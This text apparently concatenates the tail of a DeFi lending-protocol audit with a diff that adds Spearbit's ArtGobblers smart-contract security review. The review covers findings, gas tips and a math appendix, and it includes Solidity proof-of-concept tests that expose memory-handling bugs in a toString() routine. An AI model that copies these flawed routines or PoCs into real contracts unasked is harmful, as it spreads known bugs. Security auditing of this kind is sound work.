As a consequence, if the sequencer stays offline for 30 minutes (which is not that unlikely to happen), then when it resumes operation all positions marked as liquidatable before the downtime will have a 30% discount. If this risk is not acceptable, it could be avoided by requiring liquidators to enable the discount at regular intervals, before being allowed to use it. For instance, they could be required to call a function every 5 or 10 minutes to enable the discount for the corresponding period, and then wait a bit before using this discount. This essentially proves that the system is live, and that any lack of liquidation is due to insufficient incentives and not due to technical reasons. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) ID Description STATUS N1 Limiting the power of dev/exec wallets INFO The dev and exec multisig wallets have significant power over the protocol, as they can set all its different parameters, including access controllers, whitelisted borrowers (as mentioned in issue L1), the RiskFramework contract, the rewards vault, the oracle sources and many more. Nevertheless, the current codebase of the protocol does not provide any direct way for the owners of these wallets, even in a case of wallet compromise, to drain the protocol or steal user funds. The only exceptions to this are 1. what is described in issue L1, and 2. that the exec multisig is able to transfer the whole balance of a rewards vault to the treasury, which is also controlled (set) by the exec multisig. Although some level of trust in these wallets is necessary, limiting their power as much as possible is preferable. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ID Description STATUS +A1 Borrower checks can be stricter RESOLVED In function LendingProxy::borrow it is checked that the msg.sender is whitelisted, by querying the whitelistedBorrowers mapping, which can only be set by the exec role (multisig). However, it could also be required as an extra security measure that the msg.sender is a strategy registered in the StrategyRegistry contract, i.e., that it has been created by one of the whitelisted strategy factories. This would make it much more difficult to add a non-legitimate strategy as a borrower even if the exec multisig got compromised. +A2 ERC20 transfers might be of 0 value INFO The function LendingProxy::shareProfit does not check if the toTreasury and toRewardVault amounts used in the ERC20 safeTransferFrom calls are greater than 0. +A3 Number of decimals in oracle's answer is hard-coded INFO In function ChainlinkAdapterOracle::getUSDPriceE36 it is assumed that the number of decimals of the latestRoundData answer is 8 and 18 when the reference asset is USD and ETH respectively. Ideally one should use the value reported by the aggregator's decimals() function, as the aforementioned assumption might not hold in the future.
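A minimal sketch of the decimals handling suggested in A3, combined with the sanity checks of A4; the aggregator variable and the E36 scaling are illustrative assumptions:

(, int256 answer,, uint256 updatedAt,) = aggregator.latestRoundData();
require(answer > 0, "invalid price");                   // A4: positive rate
require(updatedAt <= block.timestamp, "bad timestamp"); // A4: sane timestamp
// A3: scale to 36 decimals using the feed's reported decimals instead
// of hard-coding 8 or 18.
uint8 feedDecimals = aggregator.decimals();
uint256 priceE36 = uint256(answer) * 10**(36 - uint256(feedDecimals));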
A4 Extra oracle checks INFO Function ChainlinkAdapterOracle::getUSDPriceE36 could implement an extra check that ensures that the rate returned by the aggregator's latestRoundData is greater than 0, as we expect that to hold for all asset prices. It could also be checked that the updatedAt value is not completely erroneous, by requiring it to be less than or equal to block.timestamp. +A5 Function can return early to save on gas INFO The function BasePositionViewer::calcProtInfo can return early, i.e., without calculating the yield and lender profits, which would be equal to 0, when the inputShareE18 is equal to 100%. A6 Gas optimization in case of execution reversion INFO The minDesiredHealthFactorE18 check in function getLiquidationDiscountMultiplierE18 of the BasePositionViewer contract should be moved to the start of the function, to reduce the consumed gas in cases where the execution reverts due to this check. A7 Compiler version and possible bugs INFO The code can be compiled with Solidity versions ^0.8.19. According to the foundry.toml file of the codebase, version 0.8.19 is currently used, which has some known bugs that we do not believe affect the correctness of the contracts. diff --git a/findings_newupdate/spearbit/ArtGobblers-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/ArtGobblers-Spearbit-Security-Review.txt new file mode 100644 index 0000000..f0b09f3 --- /dev/null +++ b/findings_newupdate/spearbit/ArtGobblers-Spearbit-Security-Review.txt @@ -0,0 +1,25 @@ +5.1.1 The claimGobbler function does not enforce the MINTLIST_SUPPLY on-chain Severity: Low Risk Context: ArtGobblers.sol#L287-L304 Description: There is a public constant MINTLIST_SUPPLY (2000) that is supposed to represent the number of gobblers that can be minted by using merkle proofs. However, this is not explicitly enforced in the claimGobbler function and will need to be verified off-chain from the list of merkle proof data. The risk lies in the possibility of having more than 2000 proofs. Recommendation: Consider implementing the following recommendations. 1. The check can be enforced on-chain by adding a state variable to track the number of claims and revert if there are more than MINTLIST_SUPPLY number of claims. However, this adds a state variable which needs to be updated on each claim, thereby increasing gas costs. It is understandable if such a suggestion is not implemented due to gas concerns. 2. Alternatively, publish the entire merkle proof data so that anyone can verify off-chain that it contains at most 2000 proofs. ArtGobblers: Documented this in ArtGobblers.sol#L335. /// @dev Function does not directly enforce the MINTLIST_SUPPLY limit for gas efficiency. The /// limit is enforced during the creation of the merkle proof, which will be shared publicly. +5.1.2 Feeding a gobbler to itself may lead to an infinite loop in the off-chain renderer Severity: Low Risk Context: ArtGobblers.sol#L653 Description: The contract allows feeding a gobbler to itself and while we do not think such action causes any issues on the contract side, it will nevertheless cause potential problems with the off-chain rendering for the gobblers. The project explicitly allows feeding gobblers to other gobblers. In such cases, if the off-chain renderer is designed to render the inner gobbler, it would cause an infinite loop for the self-feeding case. Additionally, when a gobbler is fed to another gobbler the user will still own one of the gobblers. However, this is not the case with self-feeding.
Recommendation: Consider implementing the following recommendations. 1. Disallowing self-feeding. 2. If self-feeding is allowed, the off-chain renderer should be designed to handle this case so that it can avoid an infinite loop. ArtGobblers: Fixed in commit fa81257. Spearbit: Acknowledged.
+5.1.3 The function toString() does not manage memory properly Severity: Low Risk Context: LibString.sol#L7-L72 Description: There are two issues with the toString() function: 1. It does not manage the memory of the returned string correctly. In short, there can be overlaps between the memory allocated for the returned string and the current free memory. 2. It assumes that the free memory is clean, i.e., it does not explicitly zero out used memory. Proof of concept for case 1: function testToStringOverwrite() public { string memory str = LibString.toString(1); uint freememptr; uint len; bytes32 data; uint raw_str_ptr; assembly { // Imagine a high level allocation writing something to the current free memory. // Should have sufficient higher order bits for this to be visible mstore(mload(0x40), not(0)) freememptr := mload(0x40) // Correctly allocate 32 more bytes, to avoid more interference mstore(0x40, add(mload(0x40), 32)) raw_str_ptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint("memptr: ", freememptr); emit log_named_uint("str: ", raw_str_ptr); emit log_named_uint("len: ", len); emit log_named_bytes32("data: ", data); } Logs: memptr: : 256 str: : 205 len: : 1 data: : 0x31000000000000000000000000000000000000ffffffffffffffffffffffffff The key issue here is that the function allocates and manages the memory region [205, 269) for the return variable. However, the free memory pointer is set to 256. The memory between [256, 269) can refer to both the string and another dynamic type that's allocated later on. Proof of concept for case 2: function testToStringDirty() public { uint freememptr; // Make the next few words of the free memory dirty assembly { let dirty := not(0) freememptr := mload(0x40) mstore(freememptr, dirty) mstore(add(freememptr, 32), dirty) mstore(add(freememptr, 64), dirty) mstore(add(freememptr, 96), dirty) mstore(add(freememptr, 128), dirty) } string memory str = LibString.toString(1); uint len; bytes32 data; assembly { freememptr := str len := mload(str) data := mload(add(str, 32)) } emit log_named_uint("str: ", freememptr); emit log_named_uint("len: ", len); emit log_named_bytes32("data: ", data); assembly { freememptr := mload(0x40) } emit log_named_uint("memptr: ", freememptr); } Logs: str: 205 len: : 1 data: : 0x31ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff memptr: : 256 In both cases, high-level Solidity will not have issues decoding values, as this region in memory is meant to be empty. However, certain ABI decoders, notably Etherscan's, will have trouble decoding them. Note: It is likely that the use of toString() in ArtGobblers will not be impacted by the above issues. However, these issues can become severe if LibString is used as a generic string library. Recommendation: For the first case, we recommend allocating 160 bytes rather than 128 bytes in LibString.sol#L22: - mstore(0x40, add(str, 128)) + mstore(0x40, add(str, 160)) For the second case, the easiest fix would be to zero out the memory that follows the final character in the string. ArtGobblers: Fixed in Solmate. Spearbit: Acknowledged.
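As a rough sketch of what the case-2 fix could look like (assuming str is the length-prefixed string produced by toString(); this is an illustration, not the Solmate patch):

pragma solidity ^0.8.0;

// Zero the 32-byte word that starts right after the final character, so
// strict ABI decoders never read back dirty free memory.
function zeroTail(string memory str) pure {
    assembly {
        // data starts at str + 0x20; the byte after the last character is
        // at str + 0x20 + length, so clear the word from there.
        mstore(add(add(str, 0x20), mload(str)), 0)
    }
}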
5.2 Gas Optimization
+5.2.1 Consider migrating all require statements to Custom Errors for gas optimization, better UX, DX and code consistency Severity: Gas Optimization Context: ArtGobblers.sol, SignedWadMath.sol, GobblersERC1155B.sol, PagesERC721.sol Description: There is a mixed usage of both require and Custom Errors to handle cases where the transaction must revert. We suggest replacing all require instances with Custom Errors in order to save gas and improve the user / developer experience. The following is a list of contract functions that still use require statements: • ArtGobblers mintLegendaryGobbler • ArtGobblers safeBatchTransferFrom • ArtGobblers safeTransferFrom • SignedWadMath wadLn • GobblersERC1155B balanceOfBatch • GobblersERC1155B _mint • GobblersERC1155B _batchMint • PagesERC721 ownerOf • PagesERC721 balanceOf • PagesERC721 approve • PagesERC721 transferFrom • PagesERC721 safeTransferFrom • PagesERC721 safeTransferFrom (overloaded version) Recommendation: Consider replacing all instances of the require statement with Custom Errors across the codebase.
+5.2.2 Minting of Gobblers and Pages can be further gas optimized Severity: Gas Optimization Context: Pages.sol#L126-L143, ArtGobblers.sol#L310-L331 Description: Currently, in order to mint a new Page or Gobbler, users must have enough $GOO in their Goo contract balance. If the user does not have enough $GOO, he/she must call ArtGobblers.removeGoo(amount) to remove the required amount from the Gobbler's balance and mint new $GOO. That $GOO will subsequently be burned to mint the Page or Gobbler. In the vast majority of cases users will never have $GOO in the Goo contract but will have their $GOO directly staked inside their Gobblers to compound and maximize the outcome. Given these premises, it makes sense to implement a function that does not require users to make two distinct transactions: • mint $GOO (via removeGoo). • burn $GOO + mint the Page/Gobbler (via mintFromGoo). but rather a single transaction that consumes the $GOO staked on the Gobbler itself, without ever minting and burning any $GOO from the Goo contract. By doing so, the user will perform the mint operation with only one transaction, and the gas cost will be much lower because it does not require any interaction with the Goo contract. Recommendation: Consider evaluating the possibility of allowing users to mint Gobblers and Pages directly from the $GOO balance in ArtGobblers to save gas. Art Gobblers: Recommendation implemented in PR 113. Spearbit: Acknowledged.
+5.2.3 Declare GobblerReserve artGobblers as immutable Severity: Gas Optimization Context: GobblerReserve.sol#L17 Description: The artGobblers in the GobblerReserve can be declared as immutable to save gas. - ArtGobblers public artGobblers; + ArtGobblers public immutable artGobblers; Recommendation: Declare the artGobblers variable as immutable. Art Gobblers: Recommendation implemented in PR 111. Spearbit: Acknowledged. 5.3 Informational
+5.3.1 Neither GobblersERC1155B nor ArtGobblers implement the ERC-165 supportsInterface function Severity: Informational Context: ArtGobblers.sol, GobblersERC1155B.sol Description: From the EIP-1155 documentation: Smart contracts implementing the ERC-1155 standard MUST implement all of the functions in the ERC1155 interface. Smart contracts implementing the ERC-1155 standard MUST implement the ERC-165 supportsInterface function and MUST return the constant value true if 0xd9b67a26 is passed through the interfaceID argument.
Neither GobblersERC1155B nor ArtGobblers actually implements the ERC-165 supportsInterface function. Recommendation: Consider implementing the required ERC-165 supportsInterface function in the GobblersERC1155B contract. ArtGobblers: Implemented in GobblersERC1155B.sol#L124 and PagesERC721.sol#L162. Spearbit: Acknowledged.
+5.3.2 LogisticVRGDA imports wadExp from SignedWadMath but never uses it Severity: Informational Context: LogisticVRGDA.sol#L4 Description: The LogisticVRGDA contract imports the wadExp function from the SignedWadMath library but never uses it. Recommendation: Remove the wadExp import to improve readability. -import {wadExp, wadLn, unsafeDiv, unsafeWadDiv} from "../lib/SignedWadMath.sol"; +import {wadLn, unsafeDiv, unsafeWadDiv} from "../lib/SignedWadMath.sol"; Art Gobblers: Recommendation implemented in PR 111. Spearbit: Acknowledged.
+5.3.3 Pages.tokenURI does not revert when pageId is the ID of an invalid or not-yet-minted token Severity: Informational Context: Pages.sol#L207-L211 Description: The current implementation of tokenURI in Pages returns an empty string if the pageId specified by the user's input has not been minted yet (pageId > currentId). Additionally, the function does not correctly handle the special case of a tokenId equal to 0, which is an invalid token ID given that the first mintable token would be the one with ID equal to 1. The EIP-721 documentation specifies that the contract should revert in this case: Throws if _tokenId is not a valid NFT. URIs are defined in RFC 3986. Recommendation: When the specified pageId has not been minted yet or is invalid, make tokenURI revert instead of returning an empty string. ArtGobblers: Fixed in commit 3494802. Spearbit: Acknowledged.
+5.3.4 Consider checking if the token fed to the Gobbler is a real ERC1155 or ERC721 token Severity: Informational Context: ArtGobblers.sol#L672-L674 Description: The current implementation of the ArtGobblers.feedArt function lets users specify, via the bool isERC1155 input parameter, whether the id passed belongs to an ERC721 or an ERC1155 token. Without checking that the passed nft address fully supports ERC721 or ERC1155, these two problems could arise: • The user can feed an arbitrary ERC20 token to a Gobbler by calling gobblers.feedArt(1, address(goo), 100, false);. In this example, we have fed 100 $GOO to the gobbler. • By just implementing safeTransferFrom or transferFrom in a generic contract, the user can feed tokens that cannot later be rendered by a Dapp because they do not fully support the ERC721 or ERC1155 standard. Recommendation: Consider checking if the nft address passed by the user as an input parameter is a valid ERC721 or ERC1155 token.
+5.3.5 Rounding down in the legendary auction leads to legendaryGobblerPrice being zero earlier than the auction interval Severity: Informational Context: ArtGobblers.sol#L443 Description: The expression below rounds down. (startPrice * (LEGENDARY_AUCTION_INTERVAL - numMintedSinceStart)) / LEGENDARY_AUCTION_INTERVAL In particular, this expression has the value 0 when numMintedSinceStart is between 573 and 581 (LEGENDARY_AUCTION_INTERVAL). Recommendation: Consider checking if this is intentional. If not, consider rounding up to the nearest integer so that the legendary gobbler price is only zero after the interval LEGENDARY_AUCTION_INTERVAL. Art Gobblers: Fixed in dc7340a. Spearbit: Acknowledged.
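If rounding up is desired, the classic add-denominator-minus-one idiom keeps the price strictly positive until numMintedSinceStart reaches the interval. A sketch (names mirror the report; the helper function itself is hypothetical, not the shipped fix):

pragma solidity ^0.8.0;

function legendaryPriceRoundedUp(
    uint256 startPrice,
    uint256 numMintedSinceStart,
    uint256 interval // LEGENDARY_AUCTION_INTERVAL
) pure returns (uint256) {
    uint256 numerator = startPrice * (interval - numMintedSinceStart);
    // (a + b - 1) / b computes ceil(a / b), so the price only reaches 0
    // once the numerator itself is 0, i.e. at the end of the interval.
    return (numerator + interval - 1) / interval;
}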
+5.3.6 Typos in code comments or natspec comments Severity: Informational Context: • Pages.sol#L179, Pages.sol#L188, Pages.sol#L205, LogisticVRGDA.sol#L23, VRGDA.sol#L34, ArtGobblers.sol#L54, ArtGobblers.sol#L745, ArtGobblers.sol#L754, ArtGobblers.sol#L606, ArtGobblers.sol#L871, ArtGobblers.sol#L421, ArtGobblers.sol#L435-L436, ArtGobblers.sol#L518, ArtGobblers.sol#L775 and ArtGobblers.sol#L781 Description: Below is a list of typos encountered in the code base and / or natspec comments: • In both Pages.sol#L179 and Pages.sol#L188 replace compromise with comprise • In Pages.sol#L205 replace pages's URI with page's URI • In LogisticVRGDA.sol#L23 replace effects with affects • In VRGDA.sol#L34 replace actions with auctions • In ArtGobblers.sol#L54, ArtGobblers.sol#L745 and ArtGobblers.sol#L754 replace compromise with comprise • In ArtGobblers.sol#L606 remove the double occurrence of the word state • In ArtGobblers.sol#L871 replace emission's with emission • In ArtGobblers.sol#L421 replace gobblers is minted with gobblers are minted and until all legendaries been sold with until all legendaries have been sold • In ArtGobblers.sol#L435-L436 replace gobblers where minted with gobblers were minted and if auction has not yet started with if the auction has not yet started • In ArtGobblers.sol#L518 replace overflow we've got bigger problems with overflow, we've got bigger problems • In ArtGobblers.sol#L775 and ArtGobblers.sol#L781 replace get emission emissionMultiple with get emissionMultiple Recommendation: We suggest fixing the above-mentioned typos to improve legibility for the end user and other developers. Art Gobblers: Recommendations implemented in PR #111. Spearbit: Acknowledged.
+5.3.7 Missing natspec comments for contracts' constructors, variables or functions Severity: Informational Description: Some of the contracts' constructors, variables and functions are missing natspec comments.
Here is the full list of them: • Pages constructor • Pages getTargetSaleDay function • LibString toString function • MerkleProofLib verify function • SignedWadMath toWadUnsafe function • SignedWadMath unsafeWadMul function • SignedWadMath unsafeWadDiv function • SignedWadMath wadMul function • SignedWadMath wadDiv function • SignedWadMath wadExp function • SignedWadMath wadLn function • SignedWadMath unsafeDiv function • VRGDA constructor • LogisticVRGDA constructor • LogisticVRGDA getTargetDayForNextSale • PostSwitchVRGDA constructor • PostSwitchVRGDA getTargetDayForNextSale • GobblerReserve artGobblers • GobblerReserve constructor • GobblersERC1155B contract is missing natspec coverage for most of the variables and functions • PagesERC721 contract is missing natspec coverage for most of the variables and functions • PagesERC721 isApprovedForAll should explicitly document the fact that the ArtGobblers contract is always pre-approved • ArtGobblers chainlinkKeyHash variable • ArtGobblers chainlinkFee variable • ArtGobblers constructor • ArtGobblers gobblerPrice is missing the @return natspec • ArtGobblers legendaryGobblerPrice is missing the @return natspec • ArtGobblers requestRandomSeed is missing the @return natspec • ArtGobblers fulfillRandomness is missing both the @return and @param natspec • ArtGobblers uri is missing the @return natspec • ArtGobblers gooBalance is missing the @return natspec • ArtGobblers mintReservedGobblers is missing the @return natspec • ArtGobblers getGobblerEmissionMultiple is missing the @return natspec • ArtGobblers getUserEmissionMultiple is missing the @return natspec • ArtGobblers safeBatchTransferFrom is missing all natspec • ArtGobblers safeTransferFrom is missing all natspec • ArtGobblers transferUserEmissionMultiple is missing the @notice natspec Recommendation: Consider adding the missing natspec comments to the above listed items. ArtGobblers: Fixed some of them in PR #111. Spearbit: Acknowledged.
+5.3.8 Potential issues due to slippage when minting legendary gobblers Severity: Informational Context: ArtGobblers.sol#L358-L360 Description: The price of a legendary mint is a function of the number of gobblers minted from goo. Because of the strict check that the price is exactly equal to the number of gobblers supplied, this can lead to slippage issues. That is, if a transaction that changes the price gets mined in the same block as a legendary mint, before the call to mintLegendaryGobbler, the legendary mint will revert. uint256 cost = legendaryGobblerPrice(); if (gobblerIds.length != cost) revert IncorrectGobblerAmount(cost); Recommendation: Consider making the check less strict. - if (gobblerIds.length != cost) revert IncorrectGobblerAmount(cost); + if (gobblerIds.length < cost) revert IncorrectGobblerAmount(cost); Note: the loop that follows, as well as the event, must also be updated accordingly. Art Gobblers: You could assume that anyone doing a legendary mint is probably using flashbots anyways, but we'd like this to be sound regardless. Fixed in PR #112. Spearbit: Acknowledged.
+5.3.9 Users who claim early have an advantage in goo production Severity: Informational Context: ArtGobblers.sol#L287 Description: The gobblers are revealed in ascending order of the index in revealGobblers. However, there can be cases when this favours users who were able to claim early: 1. There is the trivial case where a user who claimed a day earlier will have an advantage in gooBalance, as their emission starts earlier. 2.
For users who claimed gobblers on the same day (in the same period between reveals), the advantage depends on whether the gobblers are revealed in the same block or not. 1. If there is a large number of gobbler claims between two aforementioned gobblers, then it may not be possible to call revealGobblers due to the block gas limit. 2. A user at the beginning of the reveal queue may call revealGobblers for enough indices to reveal their gobbler early. In all of the above cases, the advantage is being early to start the emission of Goo. Recommendation: We recommend that the project call revealGobblers with the largest possible number that can fit in the block. Similarly, we recommend calling revealGobblers as soon as fulfillRandomness is called.
+5.3.10 Add a negativity check for decayConstant in the constructor Severity: Informational Context: VRGDA.sol#L26 Description: Price is designed to decay as time progresses. For this, it is important that the constant decayConstant is negative. Since the value is derived using an on-chain logarithm computation once, it is useful to check that the value is negative. Also, typically a decay constant is kept positive; for example, in radioactive decay the negative sign is explicitly added in the formula. It is worth keeping the same convention here, i.e., keep decayConstant as a positive number and add the negative sign in the getPrice function. However, this may cause a small increase in gas and therefore may not be worth implementing in the end. Recommendation: Consider adding the following change. decayConstant = wadLn(1e18 - periodPriceDecrease); + assert(decayConstant < 0);
+5.3.11 Improvements in toString() Severity: Informational Context: LibString.sol#L31, LibString.sol#L17 and LibString.sol#L10 Description: 1. The current toString function carefully calculates the offsets in such a way that the least significant byte of each stored word contains the ASCII value of the corresponding digit. Instead, we recommend simplifying the for loop by using mstore8. 2. There is a redundant mstore(str, k) at the beginning of the loop that can be removed. 3. Consider marking the assembly block as memory-safe and setting the version pragma to at least 0.8.13. This will allow the IR optimizer to lift stack variables to memory if a "stack-too-deep" error is encountered. Art Gobblers: The suggestions (1) and (2) are implemented in LibString.sol from Solmate. Spearbit: Acknowledged.
+5.3.12 Consideration on possible Chainlink integration concerns Severity: Informational Context: ArtGobblers.sol#L485 and ArtGobblers.sol#L489-L496 Description: The ArtGobblers project relies on the Chainlink v1 VRF service to reveal minted gobblers and assign a random emissionMultiple that can range from 6 to 9. The project has estimated that minting and revealing all gobblers will take about 10 years. In the scenario simulated by the discussion "Test to mint and reveal all the gobblers", the number of requestRandomSeed and fulfillRandomness calls made to reveal all the minted gobblers was more than 1500. Given the timespan of the project, the number of requests made to Chainlink to request a random number and the fundamental dependency on Chainlink VRF v1, we would like to highlight some concerns: • What would happen if Chainlink completely discontinues Chainlink VRF v1? At the current moment, Chainlink has already released VRF v2, which replaces and enhances VRF v1.
• What would happen in case of a Chainlink service outage if, for some reason, they decide not to process previous requests? Currently, the ArtGobblers contract does not allow requesting a new "request for randomness". • What if fulfillRandomness always gets delayed by a large number of days and users are not able to reveal their gobblers? This would not allow them to know the value of the gobbler (rarity and the visual representation) and start compounding $GOO, given that the gobbler does not have an emission multiple associated yet. • What if, by error or on purpose (malicious behavior), a Chainlink operator calls fulfillRandomness multiple times, changing the randomSeed during a reveal phase (the reveal of X gobblers can happen in multiple stages)? Recommendation: Given the important dependency of the project on Chainlink VRF v1, we suggest evaluating the scenarios listed above and verifying with the Chainlink team what the possible security countermeasures are. ArtGobblers: Fixed in PR #114. Spearbit: Acknowledged.
+5.3.13 The function toString() does not return a string aligned to a 32-byte word boundary Severity: Informational Context: LibString.sol#L38 Description: It is a good practice to align memory regions to 32-byte word boundaries. This is not necessarily the case here. However, we do not think this can lead to issues. Recommendation: Consider changing the string conversion algorithm so that the start of the string (and correspondingly, the end) will be at 32-byte word boundaries.
+5.3.14 Considerations on Legendary Gobbler price mechanics Severity: Informational Context: ArtGobblers.sol#L408 and ArtGobblers.sol#L418-L445 Description: The auction price model starts from a startPrice and decays over time. Each time a new auction starts, the starting price will be equal to max(69, prevStartPrice * 2). Users in this case are incentivized to buy the legendary gobbler as soon as the auction starts, because by doing so they are going to burn the maximum allowed amount of gobblers, allowing them to maximize the final emission multiple of the minted legendary gobbler. By doing this, they reach the end goal of maximizing the account's $GOO emissions. By waiting, the cost of the legendary gobbler decays, and so does the achievable emission multiple (because fewer gobblers can be burned). This means that if a user has enough gobblers to burn, he/she will burn them as soon as the auction starts. Another reason to mint a legendary gobbler as soon as the auction starts (and so burn as many gobblers as possible) is to make the next auction's starting price as high as possible (again for the same reason: to be able to maximize the legendary gobbler emission multiple). The next auction's starting price is determined by legendaryGobblerAuctionData.startPrice = uint120(cost < 35 ? 69 : cost << 1); These mechanisms and behaviors can result in the following consequences: • Users that hold a huge number of gobblers will burn them as soon as possible, preventing others who cannot afford that from waiting for the price to decay. • There will be fewer and fewer "normal" gobblers available to be used as part of the "art" aspect of the project. In the discussion "Test to mint and reveal all the gobblers" we have simulated a scenario in which a whale would be interested in collecting all gobblers with the end goal of maximizing $GOO production.
In that scenario, when the last Legendary Gobbler is minted, we have estimated that 9644 gobblers have been burned to mint all the legendaries. Recommendation: If the following scenarios don't fit your expected behavior, consider tweaking the current legendary gobbler price mechanics to avoid them. • Most of the gobblers will be burned to mint the legendary gobblers. • Only users that own a large number of gobblers can afford to mint legendary gobblers.
+5.3.15 Define a LEGENDARY_GOBBLER_INITIAL_START_PRICE constant to be used instead of the hardcoded 69 Severity: Informational Context: ArtGobblers.sol#L274 and ArtGobblers.sol#L408 Description: 69 is currently the starting price of the first legendary auction and will also be the price of the next auction if the final cost of the previous one (that just finished) was lower than 35. There isn't any gas benefit in using a constant variable, but it would make the code cleaner and easier to read than having hard-coded values directly. Recommendation: Consider creating a uint256 public constant LEGENDARY_GOBBLER_INITIAL_START_PRICE = 69; and using it wherever the value 69 is currently hard-coded in the code. ArtGobblers: Fixed in commit a51fca1. Spearbit: Acknowledged.
+5.3.16 Update ArtGobblers comments about some variables/functions to make them clearer Severity: Informational Context: ArtGobblers.sol#L123, ArtGobblers.sol#L169, ArtGobblers.sol#L397 and ArtGobblers.sol#L435-L437 Description: Some comments about state variables or functions could be improved to make them clearer or remove any further doubts. LEGENDARY_AUCTION_INTERVAL /// @notice Legendary auctions begin each time a multiple of these many gobblers have been minted. It could make sense for this comment to specify "minted from Goo"; otherwise someone could think that the "free" mints (mintlist, legendary, reserved) also count towards determining when a legendary auction starts. EmissionData.lastTimestamp // Timestamp of last deposit or withdrawal. These comments should be updated to cover all the scenarios where lastBalance and lastTimestamp are updated. Currently, they are updated in many more cases, for example: • mintLegendaryGobbler • revealGobblers • transferUserEmissionMultiple getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) has an outdated comment. The line getGobblerData[gobblerId].emissionMultiple = uint48(burnedMultipleTotal << 1) currently present in the mintLegendaryGobbler function has the following comment: // Must be done before minting as the transfer hook will update the user's emissionMultiple. In both ArtGobblers and GobblersERC1155B there isn't any transfer hook, which could mean that the comment is referencing outdated code. We suggest removing or updating the comment to reflect the current code implementation. legendaryGobblerPrice numMintedAtStart calculation. The variable numMintedAtStart is calculated as (numSold + 1) * LEGENDARY_AUCTION_INTERVAL The comment above the formula does not explain why it uses (numSold + 1) instead of numSold. This reason is correctly explained by a comment on the LEGENDARY_AUCTION_INTERVAL declaration. It would be better to also update the comment related to the calculation of numMintedAtStart to explain why the current formula uses (numSold + 1) instead of just numSold. transferUserEmissionMultiple: This utility function transfers an amount of a user's emission multiple to another user.
Other than transferring that emission amount, it also updates both users' lastBalance and lastTimestamp. The natspec comment should be updated to cover this information. Recommendation: Consider updating the referenced comments or removing the outdated ones to improve clarity. ArtGobblers: Fixed in PR #111. Spearbit: Acknowledged.
+5.3.17 Mark functions not called internally as external to improve code quality Severity: Informational Context: Goo.sol#L51, Goo.sol#L58, Goo.sol#L65 and GobblerReserve.sol#L30 Description: The following functions could be declared as external to save gas and improve code quality: • Goo.mintForGobblers • Goo.burnForGobblers • Goo.burnForPages • GobblerReserve.withdraw Recommendation: Consider declaring those functions as external to save gas and improve code quality. Art Gobblers: Recommendation implemented in PR 111. Spearbit: Acknowledged. 6 Appendix 6.1 Goo production when pooling gobblers The goo emitted ($\Delta s$) over a duration $\Delta t$ is given by $$\Delta s = \tfrac{1}{4} m \,\Delta t^2 + \sqrt{s \cdot m}\, \Delta t$$ Assume there are two gobblers, 1 and 2, with corresponding goo being $s_1$ and $s_2$. Consider the strategy of combining the two gobblers into a single account. We want to see if this strategy improves goo production as opposed to using them separately. $$\Delta s_1 = \tfrac{1}{4} m_1 \Delta t^2 + \sqrt{s_1 m_1}\, \Delta t \qquad \Delta s_2 = \tfrac{1}{4} m_2 \Delta t^2 + \sqrt{s_2 m_2}\, \Delta t$$ For the pooled account the emission is $$\Delta s = \tfrac{1}{4} (m_1 + m_2) \Delta t^2 + \sqrt{(s_1 + s_2)(m_1 + m_2)}\, \Delta t$$ The difference is the following: $$\Delta s - \Delta s_1 - \Delta s_2 = \left(\sqrt{(s_1 + s_2)(m_1 + m_2)} - \sqrt{s_1 m_1} - \sqrt{s_2 m_2}\right)\Delta t \quad (1)$$ The difference (1) is always non-negative. To see this, use Cauchy-Schwarz with the vectors $(x, y) = (\sqrt{s_1}, \sqrt{s_2})$ and $(a, b) = (\sqrt{m_1}, \sqrt{m_2})$, where $$(x^2 + y^2)(a^2 + b^2) \ge (ax + by)^2$$ The pooling strategy is always better, except when equality holds for Cauchy-Schwarz: this happens when $s_1 / m_1 = s_2 / m_2$. The above argument can be generalized to $n$ gobblers. In short, pooling gobblers optimizes Goo production. If this were false, users with multiple gobblers would be incentivized to split them across multiple accounts, leading to what's arguably a bad game dynamic. The above results also hint at strategies to replicate the pooled portfolio using an unpooled portfolio of gobblers.
+6.1.1 Formal proof written in SMTLIB and verified using Z3 During the review, we wrote a formal proof of the above that can be proven in Z3. This was upstreamed to the repo and can be found in goo_pooling.smt.
+6.1.2 Replicating a pooled portfolio of Gobblers and Goo with an unpooled portfolio Given $n$ accounts $1, \ldots, n$, each having a single gobbler with multiple $m_i$ and a goo balance of $s_i$, assume that there is a total of $G$ Goo available to be distributed among the accounts: we want to compute the optimal allocation of Goo. Let us say that each account $i$ receives an amount $s'_i$ of Goo, i.e., $\sum_{i=1}^{n} s'_i = G$. From equation (1) above, we see that this is equivalent to maximizing the following expression: $$\sum_{i=1}^{n} \sqrt{(s_i + s'_i)\, m_i}$$ From Cauchy-Schwarz, the sum is maximized when $$\frac{s_1 + s'_1}{m_1} = \frac{s_2 + s'_2}{m_2} = \cdots = \frac{s_n + s'_n}{m_n} = t$$ From this, we can see that $$t = \frac{\sum_{i=1}^{n} s_i + G}{\sum_{i=1}^{n} m_i}$$ and that the share $s'_i$ is given by $$s'_i = \frac{m_i}{\sum_{i=1}^{n} m_i}\left(\sum_{i=1}^{n} s_i + G\right) - s_i \quad (2)$$ The value $s'_i$ can be negative, which corresponds to taking Goo out of the gobbler!
